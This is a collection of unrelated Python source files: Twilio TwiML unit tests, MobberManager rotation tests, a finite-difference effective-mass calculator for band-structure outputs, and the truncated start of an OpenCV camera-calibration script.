assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial>' \
'<Conference beep="false" endConferenceOnExit="true" muted="true" startConferenceOnEnter="true" waitUrl="">' \
'TestConferenceMutedAttribute</Conference></Dial></Response>'
class TestQueue(TwilioTest):
def test_queue(self):
d = Dial()
d.queue('TestQueueAttribute', url='', method='GET')
r = VoiceResponse()
r.append(d)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial>' \
'<Queue method="GET" url="">TestQueueAttribute</Queue></Dial></Response>'
class TestEcho(TwilioTest):
def test_echo(self):
r = VoiceResponse()
r.echo()
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Echo /></Response>'
class TestEnqueue(TwilioTest):
def test_enqueue(self):
r = VoiceResponse()
r.enqueue(
'TestEnqueueAttribute',
action='act',
method='GET',
wait_url='wait',
wait_url_method='POST'
)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response>' \
'<Enqueue action="act" method="GET" waitUrl="wait" waitUrlMethod="POST">TestEnqueueAttribute</Enqueue>' \
'</Response>'
def test_task_string(self):
e = Enqueue(None, workflowSid='123123123')
e.task('{"account_sid": "AC123123123"}')
r = VoiceResponse()
r.append(e)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Enqueue workflowSid="123123123">' \
'<Task>{"account_sid": "AC123123123"}</Task></Enqueue></Response>'
def test_task_dict(self):
e = Enqueue(None, workflowSid='123123123')
e.task({"account_sid": "AC123123123"})
r = VoiceResponse()
r.append(e)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Enqueue workflowSid="123123123">' \
'<Task>{"account_sid": "AC123123123"}</Task></Enqueue></Response>'
class TestDial(TwilioTest):
def test_dial(self):
""" should redirect the call """
r = VoiceResponse()
r.dial("1231231234")
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial>1231231234</Dial></Response>'
def test_sim(self):
d = Dial()
d.sim('123123123')
r = VoiceResponse()
r.append(d)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Sim>123123123</Sim></Dial></Response>'
def test_sip(self):
""" should redirect the call """
d = Dial()
d.sip('foo@example.com')
r = VoiceResponse()
r.append(d)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Sip>foo@example.com</Sip></Dial></Response>'
def test_sip_username_password(self):
""" should redirect the call """
d = Dial()
d.sip('foo@example.com', username='foo', password='bar')
r = VoiceResponse()
r.append(d)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial>' \
'<Sip password="bar" username="foo">foo@example.com</Sip></Dial></Response>'
def test_add_number(self):
""" add a number to a dial """
d = Dial()
d.number('1231231234')
r = VoiceResponse()
r.append(d)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Number>1231231234</Number></Dial></Response>'
def test_add_number_status_callback_event(self):
""" add a number to a dial with status callback events"""
d = Dial()
d.number('1231231234', status_callback='http://example.com', status_callback_event='initiated completed')
r = VoiceResponse()
r.append(d)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial>' \
'<Number statusCallback="http://example.com" statusCallbackEvent="initiated completed">1231231234</Number>' \
'</Dial></Response>'
def test_add_conference(self):
""" add a conference to a dial """
d = Dial()
d.conference('My Room')
r = VoiceResponse()
r.append(d)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Conference>My Room</Conference></Dial></Response>'
def test_add_queue(self):
""" add a queue to a dial """
d = Dial()
d.queue('The Cute Queue')
r = VoiceResponse()
r.append(d)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Queue>The Cute Queue</Queue></Dial></Response>'
def test_add_empty_client(self):
""" add an empty client to a dial """
d = Dial()
d.client('')
r = VoiceResponse()
r.append(d)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Client /></Dial></Response>'
def test_add_client(self):
""" add a client to a dial """
d = Dial()
d.client('alice')
r = VoiceResponse()
r.append(d)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Dial><Client>alice</Client></Dial></Response>'
class TestGather(TwilioTest):
def test_empty(self):
""" a gather with nothing inside """
r = VoiceResponse()
r.gather()
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Gather /></Response>'
def test_gather_say(self):
g = Gather()
g.say('Hello')
r = VoiceResponse()
r.append(g)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Gather><Say>Hello</Say></Gather></Response>'
def test_nested_say_play_pause(self):
""" a gather with a say, play, and pause """
g = Gather()
g.say('Hey')
g.play(url='hey.mp3')
g.pause()
r = VoiceResponse()
r.append(g)
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><Gather><Say>Hey</Say><Play>hey.mp3</Play>' \
'<Pause /></Gather></Response>'
class TestText(TwilioTest):
def test_text(self):
r = VoiceResponse()
r.append('No tags!')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response>No tags!</Response>'
def text_mixed(self):
r = VoiceResponse()
r.append('before')
r.say('Content')
r.append('after')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response>before<Say>Content</Say>after</Response>'
def test_add_child(self):
with VoiceResponse() as r:
with r.add_child('alexa', omnipresent='true') as alexa:
alexa.add_child('purchase', 'Kindle')
assert self.strip(r) == \
'<?xml version="1.0" encoding="UTF-8"?><Response><alexa omnipresent="true">' \
'<purchase>Kindle</purchase></alexa></Response>'
| |
import random
import unittest
from approvaltests.approvals import verify
from Infrastructure.MobberManager import MobberManager
class TestsMobberManager(unittest.TestCase):
def test_empty_mobber_manager_has_no_items(self):
mobber_manager = MobberManager()
self.assertEqual(mobber_manager.mobber_count(), 0)
def test_add_mobber_chris_has_chris(self):
mobber_manager = MobberManager()
mobber_manager.add_mobber("Chris")
result = ["Chris"]
self.assertEqual(mobber_manager.get_mobbers(), result)
def test_add_mobber_joe_chris_has_joe_chris(self):
mobber_manager = MobberManager()
mobber_manager.add_mobber("Joe")
mobber_manager.add_mobber("Chris")
result = ["Joe", "Chris"]
self.assertEqual(mobber_manager.get_mobbers(), result)
def test_add_mobber_joe_chris_joe__remove_joe_has_joe_chris(self):
mobber_manager = MobberManager()
mobber_manager.add_mobber("Joe")
mobber_manager.add_mobber("Chris")
mobber_manager.add_mobber("John")
mobber_manager.remove_mobber(2)
result = ["Joe", "Chris"]
self.assertEqual(mobber_manager.get_mobbers(), result)
def test_add_4_mobbers_move_up_middle(self):
mobber_manager = MobberManager()
mobber_manager.add_mobber("Joe")
mobber_manager.add_mobber("Chris")
mobber_manager.add_mobber("Will")
mobber_manager.add_mobber("Eric")
mobber_manager.move_mobber_up(2)
result = ["Joe", "Will", "Chris", "Eric"]
self.assertEqual(mobber_manager.get_mobbers(), result)
def test_add_4_mobbers_move_up_top(self):
mobber_manager = MobberManager()
mobber_manager.add_mobber("Joe")
mobber_manager.add_mobber("Chris")
mobber_manager.add_mobber("Will")
mobber_manager.add_mobber("Eric")
mobber_manager.move_mobber_up(0)
result = ["Eric", "Chris", "Will", "Joe"]
self.assertEqual(mobber_manager.get_mobbers(), result)
def test_add_4_mobbers_move_down_middle(self):
mobber_manager = MobberManager()
mobber_manager.add_mobber("Joe")
mobber_manager.add_mobber("Chris")
mobber_manager.add_mobber("Will")
mobber_manager.add_mobber("Eric")
mobber_manager.move_mobber_down(2)
result = ["Joe", "Chris", "Eric", "Will"]
self.assertEqual(mobber_manager.get_mobbers(), result)
def test_add_4_mobbers_move_down_bottom(self):
mobber_manager = MobberManager()
mobber_manager.add_mobber("Joe")
mobber_manager.add_mobber("Chris")
mobber_manager.add_mobber("Will")
mobber_manager.add_mobber("Eric")
mobber_manager.move_mobber_down(3)
result = ["Eric", "Chris", "Will", "Joe"]
self.assertEqual(mobber_manager.get_mobbers(), result)
def test_move_down_empty(self):
mobber_manager = MobberManager()
mobber_manager.move_mobber_down(0)
result = []
self.assertEqual(mobber_manager.get_mobbers(), result)
def test_move_up_empty(self):
mobber_manager = MobberManager()
mobber_manager.move_mobber_up(0)
result = []
self.assertEqual(mobber_manager.get_mobbers(), result)
def test_remove_empty(self):
mobber_manager = MobberManager()
mobber_manager.remove_mobber(0)
result = []
self.assertEqual(mobber_manager.get_mobbers(), result)
def test_clear(self):
mobber_manager = MobberManager()
mobber_manager.add_mobber("Joe")
mobber_manager.add_mobber("Chris")
mobber_manager.add_mobber("Sam")
mobber_manager.clear()
result = []
self.assertEqual(mobber_manager.get_mobbers(), result)
def test_subscribe_to_mobber_list_changes(self):
mobber_manager = MobberManager()
result = {"result": "Mobbers in List for Each Change\n", "increment": 0}
def time_change_callback(mobber_list, driver_index, navigator_index):
result["increment"] += 1
result["result"] += "Action " + result["increment"].__str__() + ":"
for mobber_index in range(0, mobber_list.__len__()):
result["result"] += mobber_list[mobber_index]
if mobber_index == driver_index:
result["result"] += " (Driver)"
if mobber_index == navigator_index:
result["result"] += " (Navigator)"
result["result"] += ", "
result["result"] += "\n"
mobber_manager.subscribe_to_mobber_list_change(time_change_callback)
def on_mobber_add(mobber_name):
result["increment"] += 1
result["result"] += "Action " + result["increment"].__str__() + ":" + mobber_name + " added\n"
mobber_manager.subscribe_to_mobber_add(on_mobber_add)
def on_mobber_remove(mobber_name):
result["increment"] += 1
result["result"] += "Action " + result["increment"].__str__() + ":" + mobber_name + " removed\n"
mobber_manager.subscribe_to_mobber_remove(on_mobber_remove)
mobber_manager.add_mobber("Joe")
mobber_manager.add_mobber("Chris")
mobber_manager.add_mobber("Sam")
mobber_manager.add_mobber("John")
mobber_manager.switch_next_driver()
mobber_manager.add_mobber("Bill")
mobber_manager.switch_next_driver()
mobber_manager.switch_next_driver()
mobber_manager.switch_next_driver()
mobber_manager.switch_next_driver()
mobber_manager.switch_next_driver()
mobber_manager.remove_mobber(2)
mobber_manager.remove_mobber(0)
mobber_manager.switch_next_driver()
mobber_manager.rewind_driver()
mobber_manager.add_mobber("Seth")
mobber_manager.rewind_driver()
mobber_manager.rewind_driver()
mobber_manager.rewind_driver()
mobber_manager.move_mobber_down(0)
mobber_manager.add_mobber("Fredrick")
mobber_manager.move_mobber_up(2)
mobber_manager.remove_mobber(1)
mobber_manager.remove_mobber(0)
mobber_manager.remove_mobber(0)
verify(result["result"])
def test_subscribe_to_mobber_list_changes_random(self):
random.seed(0)
mobber_manager = MobberManager(True)
result = {"result": "Mobbers in List for Each Change\n", "increment": 0}
def time_change_callback(mobber_list, driver_index, navigator_index):
result["increment"] += 1
result["result"] += "Action " + result["increment"].__str__() + ":"
for mobber_index in range(0, mobber_list.__len__()):
result["result"] += mobber_list[mobber_index]
if mobber_index == driver_index:
result["result"] += " (Driver)"
if mobber_index == navigator_index:
result["result"] += " (Next)"
result["result"] += ", "
result["result"] += "\n"
def on_mobber_add(mobber_name):
result["increment"] += 1
result["result"] += "Action " + result["increment"].__str__() + ":" + mobber_name + " added\n"
mobber_manager.subscribe_to_mobber_add(on_mobber_add)
def on_mobber_remove(mobber_name):
result["increment"] += 1
result["result"] += "Action " + result["increment"].__str__() + ":" + mobber_name + " removed\n"
mobber_manager.subscribe_to_mobber_remove(on_mobber_remove)
mobber_manager.subscribe_to_mobber_list_change(time_change_callback)
mobber_manager.add_mobber("Joe")
mobber_manager.add_mobber("Chris")
mobber_manager.add_mobber("Sam")
mobber_manager.add_mobber("John")
mobber_manager.switch_next_driver()
mobber_manager.add_mobber("Bill")
mobber_manager.switch_next_driver()
mobber_manager.switch_next_driver()
mobber_manager.switch_next_driver()
mobber_manager.set_mobber_list(["Hello", "Eric", "Joe"])
mobber_manager.switch_next_driver()
mobber_manager.switch_next_driver()
mobber_manager.remove_mobber(2)
mobber_manager.remove_mobber(0)
mobber_manager.switch_next_driver()
mobber_manager.add_mobber("Seth")
mobber_manager.move_mobber_down(0)
mobber_manager.add_mobber("Fredrick")
mobber_manager.move_mobber_up(2)
mobber_manager.remove_mobber(1)
mobber_manager.remove_mobber(0)
mobber_manager.remove_mobber(0)
verify(result["result"])
def test_navigator1_driver0_index(self):
mobber_manager = MobberManager()
mobber_manager.add_mobber("Joe")
mobber_manager.add_mobber("Chris")
result = "Navigator: " + str(mobber_manager.next_driver_index) + " Driver: " + str(mobber_manager.driver_index)
self.assertEqual(result, "Navigator: 1 Driver: 0")
def test_switch_navigator0_driver1_index(self):
mobber_manager = MobberManager()
mobber_manager.add_mobber("Joe")
mobber_manager.add_mobber("Chris")
mobber_manager.switch_next_driver()
result = "Navigator: " + str(mobber_manager.next_driver_index) + " Driver: " + str(mobber_manager.driver_index)
self.assertEqual(result, "Navigator: 0 Driver: 1")
if __name__ == '__main__':
unittest.main()
| |
#!/usr/bin/env python
EMC_VERSION = '1.51py'
STENCIL = 3 # or 5
#
###################################################################################################
#
# STENCILS for finite difference
#
# three-point stencil
st3 = []
st3.append([0.0, 0.0, 0.0]); # 0
st3.append([-1.0, 0.0, 0.0]); st3.append([1.0, 0.0, 0.0]); # dx 1-2
st3.append([0.0, -1.0, 0.0]); st3.append([0.0, 1.0, 0.0]) # dy 3-4
st3.append([0.0, 0.0, -1.0]); st3.append([0.0, 0.0, 1.0]) # dz 5-6
st3.append([-1.0, -1.0, 0.0]); st3.append([1.0, 1.0, 0.0]); st3.append([1.0, -1.0, 0.0]); st3.append([-1.0, 1.0, 0.0]); # dxdy 7-10
st3.append([-1.0, 0.0, -1.0]); st3.append([1.0, 0.0, 1.0]); st3.append([1.0, 0.0, -1.0]); st3.append([-1.0, 0.0, 1.0]); # dxdz 11-14
st3.append([0.0, -1.0, -1.0]); st3.append([0.0, 1.0, 1.0]); st3.append([0.0, 1.0, -1.0]); st3.append([0.0, -1.0, 1.0]); # dydz 15-18
#
# five-point stencil
st5 = []
st5.append([0.0, 0.0, 0.0])
#
a = [-2,-1,1,2]
for i in range(len(a)): #dx
st5.append([float(a[i]), 0., 0.])
#
for i in range(len(a)): #dy
st5.append([0., float(a[i]), 0.])
#
for i in range(len(a)): #dz
st5.append([0., 0., float(a[i])])
#
for i in range(len(a)):
i1=float(a[i])
for j in range(len(a)):
j1=float(a[j])
st5.append([j1, i1, 0.]) # dxdy
#
for i in range(len(a)):
i1=float(a[i])
for j in range(len(a)):
j1=float(a[j])
st5.append([j1, 0., i1,]) # dxdz
#
for i in range(len(a)):
i1=float(a[i])
for j in range(len(a)):
j1=float(a[j])
st5.append([0., j1, i1]) # dydz
#
# CONSTANTS
#
Bohr = 0.52917721092
#
####### FUNCTIONS and __main__ ##################################################################
#
def MAT_m_VEC(m, v):
p = [ 0.0 for i in range(len(v)) ]
for i in range(len(m)):
assert len(v) == len(m[i]), 'Length of the matrix row is not equal to the length of the vector'
p[i] = sum( [ m[i][j]*v[j] for j in range(len(v)) ] )
return p
def T(m):
p = [[ m[i][j] for i in range(len( m[j] )) ] for j in range(len( m )) ]
return p
def N(v):
max_ = 0.
for item in v:
if abs(item) > abs(max_): max_ = item
return [ item/max_ for item in v ]
def DET_3X3(m):
assert len(m) == 3, 'Matrix should be of the size 3 by 3'
return m[0][0]*m[1][1]*m[2][2] + m[1][0]*m[2][1]*m[0][2] + m[2][0]*m[0][1]*m[1][2] - \
m[0][2]*m[1][1]*m[2][0] - m[2][1]*m[1][2]*m[0][0] - m[2][2]*m[0][1]*m[1][0]
def SCALE_ADJOINT_3X3(m, s):
a = [[0.0 for i in range(3)] for j in range(3)]
a[0][0] = (s) * (m[1][1] * m[2][2] - m[1][2] * m[2][1])
a[1][0] = (s) * (m[1][2] * m[2][0] - m[1][0] * m[2][2])
a[2][0] = (s) * (m[1][0] * m[2][1] - m[1][1] * m[2][0])
a[0][1] = (s) * (m[0][2] * m[2][1] - m[0][1] * m[2][2])
a[1][1] = (s) * (m[0][0] * m[2][2] - m[0][2] * m[2][0])
a[2][1] = (s) * (m[0][1] * m[2][0] - m[0][0] * m[2][1])
a[0][2] = (s) * (m[0][1] * m[1][2] - m[0][2] * m[1][1])
a[1][2] = (s) * (m[0][2] * m[1][0] - m[0][0] * m[1][2])
a[2][2] = (s) * (m[0][0] * m[1][1] - m[0][1] * m[1][0])
return a
def INVERT_3X3(m):
tmp = 1.0/DET_3X3(m)
return SCALE_ADJOINT_3X3(m, tmp)
def IS_SYMMETRIC(m):
for i in range(len(m)):
for j in range(len(m[i])):
if m[i][j] != m[j][i]: return False # automatically checks square-shape
return True
def jacobi(ainput):
# from NWChem/contrib/python/mathutil.py
# possible need to rewrite due to licensing issues
#
from math import sqrt
#
a = [[ ainput[i][j] for i in range(len( ainput[j] )) ] for j in range(len( ainput )) ] # copymatrix
n = len(a)
m = len(a[0])
if n != m:
raise 'jacobi: Matrix must be square'
#
for i in range(n):
for j in range(m):
if a[i][j] != a[j][i]:
raise 'jacobi: Matrix must be symmetric'
#
tolmin = 1e-14
tol = 1e-4
#
v = [[0.0 for i in range(n)] for j in range(n)] # zeromatrix
for i in range(n):
v[i][i] = 1.0
#
maxd = 0.0
for i in range(n):
maxd = max(abs(a[i][i]),maxd)
#
for iter in range(50):
nrot = 0
for i in range(n):
for j in range(i+1,n):
aii = a[i][i]
ajj = a[j][j]
daij = abs(a[i][j])
if daij > tol*maxd: # Screen small elements
nrot = nrot + 1
s = aii - ajj
ds = abs(s)
if daij > (tolmin*ds): # Check for sufficient precision
if (tol*daij) > ds:
c = s = 1/sqrt(2.)
else:
t = a[i][j]/s
u = 0.25/sqrt(0.25+t*t)
c = sqrt(0.5+u)
s = 2.*t*u/c
#
for k in range(n):
u = a[i][k]
t = a[j][k]
a[i][k] = s*t + c*u
a[j][k] = c*t - s*u
#
for k in range(n):
u = a[k][i]
t = a[k][j]
a[k][i] = s*t + c*u
a[k][j]= c*t - s*u
#
for k in range(n):
u = v[i][k]
t = v[j][k]
v[i][k] = s*t + c*u
v[j][k] = c*t - s*u
#
a[j][i] = a[i][j] = 0.0
maxd = max(maxd,abs(a[i][i]),abs(a[j][j]))
#
if nrot == 0 and tol <= tolmin:
break
tol = max(tolmin,tol*0.99e-2)
#
if nrot != 0:
print 'jacobi: [WARNING] Jacobi iteration did not converge in 50 passes!'
#
# Sort eigenvectors and values into increasing order
e = [0.0 for i in range(n)] # zerovector
for i in range(n):
e[i] = a[i][i]
for j in range(i):
if e[j] > e[i]:
(e[i],e[j]) = (e[j],e[i])
(v[i],v[j]) = (v[j],v[i])
#
return (v,e)
#
def cart2frac(basis, v):
return MAT_m_VEC( T(INVERT_3X3(basis)), v )
def fd_effmass_st3(e, h):
m = [[0.0 for i in range(3)] for j in range(3)]
m[0][0] = (e[1] - 2.0*e[0] + e[2])/h**2
m[1][1] = (e[3] - 2.0*e[0] + e[4])/h**2
m[2][2] = (e[5] - 2.0*e[0] + e[6])/h**2
m[0][1] = (e[7] + e[8] - e[9] - e[10])/(4.0*h**2)
m[0][2] = (e[11] + e[12] - e[13] - e[14])/(4.0*h**2)
m[1][2] = (e[15] + e[16] - e[17] - e[18])/(4.0*h**2)
# symmetrize
m[1][0] = m[0][1]
m[2][0] = m[0][2]
m[2][1] = m[1][2]
#
print '-> fd_effmass_st3: Effective mass tensor:\n'
for i in range(len(m)):
print '%15.8f %15.8f %15.8f' % (m[i][0], m[i][1], m[i][2])
print ''
#
return m
def fd_effmass_st5(e, h):
m = [[0.0 for i in range(3)] for j in range(3)]
#
m[0][0] = (-(e[1]+e[4]) + 16.0*(e[2]+e[3]) - 30.0*e[0])/(12.0*h**2)
m[1][1] = (-(e[5]+e[8]) + 16.0*(e[6]+e[7]) - 30.0*e[0])/(12.0*h**2)
m[2][2] = (-(e[9]+e[12]) + 16.0*(e[10]+e[11]) - 30.0*e[0])/(12.0*h**2)
#
m[0][1] = (-63.0*(e[15]+e[20]+e[21]+e[26]) + 63.0*(e[14]+e[17]+e[27]+e[24]) \
+44.0*(e[16]+e[25]-e[13]-e[28]) + 74.0*(e[18]+e[23]-e[19]-e[22]))/(600.0*h**2)
m[0][2] = (-63.0*(e[31]+e[36]+e[37]+e[42]) + 63.0*(e[30]+e[33]+e[43]+e[40]) \
+44.0*(e[32]+e[41]-e[29]-e[44]) + 74.0*(e[34]+e[39]-e[35]-e[38]))/(600.0*h**2)
m[1][2] = (-63.0*(e[47]+e[52]+e[53]+e[58]) + 63.0*(e[46]+e[49]+e[59]+e[56]) \
+44.0*(e[48]+e[57]-e[45]-e[60]) + 74.0*(e[50]+e[55]-e[51]-e[54]))/(600.0*h**2)
#
# symmetrize
m[1][0] = m[0][1]
m[2][0] = m[0][2]
m[2][1] = m[1][2]
#
print '-> fd_effmass_st5: Effective mass tensor:\n'
for i in range(3):
print '%15.8f %15.8f %15.8f' % (m[i][0], m[i][1], m[i][2])
print ''
#
return m
def generate_kpoints(kpt_frac, st, h, prg, basis):
from math import pi
#
# working in the reciprocal space
m = INVERT_3X3(T(basis))
basis_r = [[ m[i][j]*2.0*pi for j in range(3) ] for i in range(3) ]
#
kpt_rec = MAT_m_VEC(T(basis_r), kpt_frac)
print '-> generate_kpoints: K-point in reciprocal coordinates: %5.3f %5.3f %5.3f' % (kpt_rec[0], kpt_rec[1], kpt_rec[2])
#
if prg == 'V' or prg == 'P':
h = h*(1/Bohr) # [1/A]
#
kpoints = []
for i in range(len(st)):
k_c_ = [ kpt_rec[j] + st[i][j]*h for j in range(3) ] # getting displaced k points in Cartesian coordinates
k_f = cart2frac(basis_r, k_c_)
kpoints.append( [k_f[0], k_f[1], k_f[2]] )
#
return kpoints
def parse_bands_CASTEP(eigenval_fh, band, diff2_size, debug=False):
# Number of k-points X
nkpt = int(eigenval_fh.readline().strip().split()[3])
# Number of spin components X
spin_components = float(eigenval_fh.readline().strip().split()[4])
# Number of electrons X.00 Y.00
tmp = eigenval_fh.readline().strip().split()
if spin_components == 1:
nelec = int(float(tmp[3]))
n_electrons_down = None
elif spin_components == 2:
nelec = [float(tmp[3])]
n_electrons_down = int(float(tmp[4]))
# Number of eigenvalues X
nband = int(eigenval_fh.readline().strip().split()[3])
energies = []
# Get eigenenergies and unit cell from .bands file
while True:
line = eigenval_fh.readline()
if not line:
break
#
if 'Spin component 1' in line:
for i in range(1, nband + 1):
energy = float(eigenval_fh.readline().strip())
if band == i:
energies.append(energy)
return energies
def parse_EIGENVAL_VASP(eigenval_fh, band, diff2_size, debug=False):
ev2h = 1.0/27.21138505
eigenval_fh.seek(0) # just in case
eigenval_fh.readline()
eigenval_fh.readline()
eigenval_fh.readline()
eigenval_fh.readline()
eigenval_fh.readline()
#
nelec, nkpt, nband = [int(s) for s in eigenval_fh.readline().split()]
if debug: print 'From EIGENVAL: Number of the valence band is %d (NELECT/2)' % (nelec/2)
if band > nband:
print 'Requested band (%d) is larger than total number of the calculated bands (%d)!' % (band, nband)
sys.exit(1)
energies = []
for i in range(diff2_size):
eigenval_fh.readline() # empty line
eigenval_fh.readline() # k point coordinates
for j in range(1, nband+1):
line = eigenval_fh.readline()
if band == j:
energies.append(float(line.split()[1])*ev2h)
if debug: print ''
return energies
#
def parse_nscf_PWSCF(eigenval_fh, band, diff2_size, debug=False):
ev2h = 1.0/27.21138505
eigenval_fh.seek(0) # just in case
engrs_at_k = []
energies = []
#
while True:
line = eigenval_fh.readline()
if not line:
break
#
if "End of band structure calculation" in line:
for i in range(diff2_size):
#
while True:
line = eigenval_fh.readline()
if "occupation numbers" in line:
break
#
if "k =" in line:
a = [] # energies at a k-point
eigenval_fh.readline() # empty line
#
while True:
line = eigenval_fh.readline()
if line.strip() == "": # empty line
break
#
a.extend(line.strip().split())
#
#print a
assert len(a) <= band, 'Length of the energies array at a k-point is smaller than band param'
energies.append(float(a[band-1])*ev2h)
#
#print engrs_at_k
return energies
#
def parse_inpcar(inpcar_fh, debug=False):
import sys
import re
#
kpt = [] # k-point at which eff. mass in reciprocal reduced coords (3 floats)
stepsize = 0.0 # stepsize for finite difference (1 float) in Bohr
band = 0 # band for which eff. mass is computed (1 int)
prg = '' # program identifier (1 char)
basis = [] # basis vectors in cartesian coords (3x3 floats), units depend on the program identifier
#
inpcar_fh.seek(0) # just in case
p = re.search(r'^\s*(-*\d+\.\d+)\s+(-*\d+\.\d+)\s+(-*\d+\.\d+)', inpcar_fh.readline())
if p:
kpt = [float(p.group(1)), float(p.group(2)), float(p.group(3))]
if debug: print "Found k point in the reduced reciprocal space: %5.3f %5.3f %5.3f" % (kpt[0], kpt[1], kpt[2])
else:
print "Was expecting k point on the line 0 (3 floats), didn't get it, exiting..."
sys.exit(1)
p = re.search(r'^\s*(\d+\.\d+)', inpcar_fh.readline())
if p:
stepsize = float(p.group(1))
if debug: print "Found stepsize of: %5.3f (1/Bohr)" % stepsize
else:
print "Was expecting a stepsize on line 1 (1 float), didn't get it, exiting..."
sys.exit(1)
p = re.search(r'^\s*(\d+)', inpcar_fh.readline())
if p:
band = int(p.group(1))
if debug: print "Requested band is : %5d" % band
else:
print "Was expecting band number on line 2 (1 int), didn't get it, exiting..."
sys.exit(1)
p = re.search(r'^\s*(\w)', inpcar_fh.readline())
if p:
prg = p.group(1)
if debug: print "Program identifier is: %5c" % prg
else:
print "Was expecting program identifier on line 3 (1 char), didn't get it, exiting..."
sys.exit(1)
for i in range(3):
p = re.search(r'^\s*(-*\d+\.\d+)\s+(-*\d+\.\d+)\s+(-*\d+\.\d+)', inpcar_fh.readline())
if p:
basis.append([float(p.group(1)), float(p.group(2)), float(p.group(3))])
if debug:
print "Real space basis:"
for i in range(len(basis)):
print '%9.7f %9.7f %9.7f' % (basis[i][0], basis[i][1], basis[i][2])
if debug: print ''
return kpt, stepsize, band, prg, basis
def get_eff_masses(m, basis):
#
vecs_cart = [[0.0 for i in range(3)] for j in range(3)]
vecs_frac = [[0.0 for i in range(3)] for j in range(3)]
vecs_n = [[0.0 for i in range(3)] for j in range(3)]
#
eigvec, eigval = jacobi(m)
#
for i in range(3):
vecs_cart[i] = eigvec[i]
vecs_frac[i] = cart2frac(basis, eigvec[i])
vecs_n[i] = N(vecs_frac[i])
#
em = [ 1.0/eigval[i] for i in range(len(eigval)) ]
return em, vecs_cart, vecs_frac, vecs_n
#
if __name__ == "__main__":
import sys
import re
import datetime
import time
filename = 'emcpy.out_'+str(int(time.time()))
print 'Redirecting output to '+filename
sys.stdout = open(filename, 'w')
#
if STENCIL == 3:
fd_effmass = fd_effmass_st3
st = st3
elif STENCIL == 5:
fd_effmass = fd_effmass_st5
st = st5
else:
print 'main: [ERROR] Wrong value for STENCIL, should be 3 or 5.'
sys.exit(1)
#
print 'Effective mass calculator '+EMC_VERSION
print 'Stencil: '+str(STENCIL)
print 'License: MIT'
print 'Developed by: Alexandr Fonari and Chris Sutton'
print 'Started at: '+datetime.datetime.now().strftime("%Y-%m-%d %H:%M")+'\n'
#
if len(sys.argv) == 1:
print "Run as:"
print " %s input.in [output.out]" % sys.argv[0]
print ""
sys.exit(1)
inpcar_fn = sys.argv[1]
#
try:
inpcar_fh = open(inpcar_fn, 'r')
except IOError:
sys.exit("Couldn't open input file "+inpcar_fn+", exiting...\n")
#
print "Contents of the "+inpcar_fn+" file:\n"
print inpcar_fh.read()
print ""
print "=========="
print ""
#
kpt, stepsize, band, prg, basis = parse_inpcar(inpcar_fh)
#
output_fn = None
if len(sys.argv) > 2:
output_fn = sys.argv[2]
try:
output_fh = open(output_fn, 'r')
except IOError:
sys.exit("Couldn't open input file "+output_fn+", exiting...\n")
#
if output_fn:
print 'Successfully opened '+output_fn+', preparing to parse it...\n'
#
energies = []
if prg.upper() == 'V' or prg.upper() == 'C':
energies = parse_EIGENVAL_VASP(output_fh, band, len(st))
m = fd_effmass(energies, stepsize)
#
if prg.upper() == 'Q':
energies = parse_nscf_PWSCF(output_fh, band, len(st))
m = fd_effmass(energies, stepsize)
#
if prg.upper() == 'P':
energies = parse_bands_CASTEP(output_fh, band, len(st))
m = fd_effmass(energies, stepsize)
#
masses, vecs_cart, vecs_frac, vecs_n = get_eff_masses(m, basis)
print 'Principle effective masses and directions:\n'
for i in range(3):
print 'Effective mass (%d): %12.3f' % (i, masses[i])
print 'Original eigenvectors: %7.5f %7.5f %7.5f' % (vecs_cart[i][0], vecs_cart[i][1], vecs_cart[i][2])
print 'Normal fractional coordinates: %7.5f %7.5f %7.5f\n' % (vecs_n[i][0], vecs_n[i][1], vecs_n[i][2])
#
else:
print 'No output file provided, entering the Generation regime...\n'
#
if prg.upper() == "C" and band != 1:
print " Band should be set to 1 for CRYSTAL calculations,"
print " desired band number is set as a parameter (-b) for cry-getE.pl script."
print ""
sys.exit(1)
#
kpoints = generate_kpoints(kpt, st, stepsize, prg, basis)
kpoints_fh = open('KPOINTS', 'w')
kpoints_fh.write("EMC "+EMC_VERSION+"\n")
kpoints_fh.write("%d\n" % len(st))
kpoints_fh.write("Reciprocal\n")
#
for i, kpt in enumerate(kpoints):
kpoints_fh.write( '%15.10f %15.10f %15.10f 0.01\n' % (kpt[0], kpt[1], kpt[2]) )
#
kpoints_fh.close()
print 'KPOINTS file has been generated in the current directory...\n'
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Calibrate camera using checkerboard pattern
@author: Kevin Middleton
Based on:
https://github.com/ying17zi/gopro-undistort
and
Off-line camera calibration
Author: Leow Wee Kheng
Department of Computer Science, National University of Singapore
Last update: 20 Sep 2012
http://www.comp.nus.edu.sg/~cs4243/code/calibrate.py
"""
import cv2
import argparse
import random
import time
import sys
if __name__ == '__main__':
# Tic
t0 = time.time()
# Parse options
parser = argparse.ArgumentParser(description='Options')
parser.add_argument('-f', '--file',
help='Calibration video',
required=True)
parser.add_argument('--fps',
